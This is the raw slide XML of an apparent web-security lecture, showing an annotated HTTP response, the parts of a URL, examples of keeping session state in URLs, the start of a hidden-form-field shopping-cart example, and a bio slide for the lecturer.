                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(optional)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Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Grouper 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="326014" y="1943922"/>
            <a:ext cx="9486112" cy="4947341"/>
            <a:chOff x="326014" y="1198211"/>
            <a:chExt cx="9486112" cy="7243403"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86019" name="Text Box 3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2097060" y="2069639"/>
              <a:ext cx="7715066" cy="63719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101362" tIns="50681" rIns="101362" bIns="50681"/>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>HTTP/1.1 200 OK</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Date: Thu, 24 Jul 2008 17:36:27 GMT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Server: Apache-Coyote/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Content-Type: text/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>html;charset</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=UTF-8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Content-Length: 1846</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>blank line</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;html&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>...</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>&lt;/html&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86020" name="Text Box 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3862820" y="1198211"/>
              <a:ext cx="981038" cy="415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2700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Status</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86021" name="Line 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4352721" y="1602299"/>
              <a:ext cx="0" cy="590321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med" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86023" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5893686" y="1198211"/>
              <a:ext cx="2481449" cy="415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700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Status Message</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86024" name="Line 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2519996" y="1602299"/>
              <a:ext cx="0" cy="590321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med" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86025" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1949033" y="1198211"/>
              <a:ext cx="1167719" cy="415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2700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Version</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86026" name="AutoShape 10"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1776336" y="2614278"/>
              <a:ext cx="130549" cy="3086235"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 79070"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86027" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="326014" y="3120267"/>
              <a:ext cx="1308050" cy="415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2700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Headers</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86028" name="AutoShape 12"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1762869" y="6818170"/>
              <a:ext cx="169175" cy="1096309"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 54167"/>
                <a:gd name="adj2" fmla="val 50000"/>
              </a:avLst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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86029" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="754757" y="7176491"/>
              <a:ext cx="788677" cy="415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2700" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="folHlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Body</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86030" name="Freeform 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5075237" y="1433636"/>
              <a:ext cx="761286" cy="758984"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="432" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="384"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="432" h="384">
                  <a:moveTo>
                    <a:pt x="432" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="384"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="1905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lIns="101362" tIns="50681" rIns="101362" bIns="50681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Uniform Resource Locators (URLs)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359498" y="3146624"/>
            <a:ext cx="9368043" cy="47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362" tIns="50681" rIns="101362" bIns="50681">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>http://www.company.com:81/a/b/c.html?user=Alice&amp;year=2008#p2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76805" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="2397777" y="2301680"/>
            <a:ext cx="168663" cy="2817814"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 138802"/>
              <a:gd name="adj2" fmla="val 50000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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76806" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="653164" y="2731949"/>
            <a:ext cx="168663" cy="607972"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 29948"/>
              <a:gd name="adj2" fmla="val 50000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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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165652" y="1786776"/>
            <a:ext cx="1051503" cy="379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362" tIns="50681" rIns="101362" bIns="50681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Scheme</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76809" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2479466" y="3879251"/>
            <a:ext cx="0" cy="674652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 lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76810" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1798101" y="4485385"/>
            <a:ext cx="1359204" cy="379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362" tIns="50681" rIns="101362" bIns="50681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Host Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76811" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="4101859" y="2858833"/>
            <a:ext cx="168663" cy="354209"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 17448"/>
              <a:gd name="adj2" fmla="val 50000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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76812" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="734853" y="2192620"/>
            <a:ext cx="0" cy="674652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 lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76813" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3430489" y="1786776"/>
            <a:ext cx="1513167" cy="379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362" tIns="50681" rIns="101362" bIns="50681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Port Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76814" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="4990906" y="3033889"/>
            <a:ext cx="168663" cy="1353397"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>
              <a:gd name="adj2" fmla="val 50000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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76815" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5078762" y="3879251"/>
            <a:ext cx="0" cy="674652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 lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76816" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3980368" y="4485385"/>
            <a:ext cx="2193266" cy="379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362" tIns="50681" rIns="101362" bIns="50681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Hierarchical portion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76817" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="7359350" y="1428779"/>
            <a:ext cx="168663" cy="3214317"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>
              <a:gd name="adj2" fmla="val 50000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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76818" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7438396" y="2192620"/>
            <a:ext cx="0" cy="674652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 lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76819" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7011175" y="1786776"/>
            <a:ext cx="833294" cy="379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362" tIns="50681" rIns="101362" bIns="50681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Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76820" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="9304859" y="3456825"/>
            <a:ext cx="168663" cy="507524"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 50000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lIns="101362" tIns="50681" rIns="101362" bIns="50681" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76822" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8789412" y="4485385"/>
            <a:ext cx="1192504" cy="379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362" tIns="50681" rIns="101362" bIns="50681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Fragment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76823" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9385665" y="3879251"/>
            <a:ext cx="0" cy="674652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 lIns="101362" tIns="50681" rIns="101362" bIns="50681"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76824" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4187071" y="2192620"/>
            <a:ext cx="0" cy="674652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 lIns="101362" tIns="50681" rIns="101362" bIns="5068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04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How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to keep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>state information on sessions? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4096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 is stateless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1600200" y="144463"/>
            <a:ext cx="8382000" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>HTTP: Session in URL Example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38163" y="1778001"/>
            <a:ext cx="3600450" cy="466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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>http://www.buy.com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66725" y="3074989"/>
            <a:ext cx="6337300" cy="461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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>http://www.buy.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>/shopping.cfm?pID=269</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p: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>
            <a:off x="1258888" y="2282827"/>
            <a:ext cx="0" cy="6477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403350" y="2489200"/>
            <a:ext cx="1943100" cy="369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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>see catalog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66727" y="4443413"/>
            <a:ext cx="9217025" cy="466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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>http://www.buy.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>/shopping.cfm?pID=269&amp;item=40002</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p: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>
            <a:off x="1258888" y="3660775"/>
            <a:ext cx="0" cy="6477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403350" y="3867150"/>
            <a:ext cx="1943100" cy="369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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>select item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66727" y="5811838"/>
            <a:ext cx="9217025" cy="466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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>http://www.buy.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>/checkout.cfm?pID=269&amp;item=40002</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p: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>
            <a:off x="1258888" y="5019677"/>
            <a:ext cx="0" cy="6477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403350" y="5226050"/>
            <a:ext cx="1943100" cy="369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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buy item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827088" y="6530975"/>
            <a:ext cx="7416800" cy="369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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Since HTTP is stateless all session information is saved in the URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37903" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5470527" y="7170738"/>
            <a:ext cx="4679950" cy="369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>
            <a:spAutoFit/>
          </a:bodyPr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Thanks Ricardo Corin for this slide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1" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="14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Tamara Rezk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>http://www-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>sop.inria.fr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/members/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Tamara.Rezk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>tamara.rezk@inria.fr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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Researcher at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>INRIA (Sophia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Antipolis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)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Phd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> thesis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>information flow security of mobile code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>current research topics:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>web security, information flow security, formalization and verification of security  properties, proofs of cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i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768477" y="194519"/>
            <a:ext cx="83820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/>
              <a:t>HTTP: Session in hidden field Example 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898527" y="2138365"/>
            <a:ext cx="7993063" cy="4785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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="3500">
              <a:latin typeface="ArialMT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>&lt;FORM METHOD=POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="CourierNewPSMT"/>
              </a:rPr>
              <a:t>Black Leather purse with leather straps&lt;BR&gt;Price: $20.00&lt;BR&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
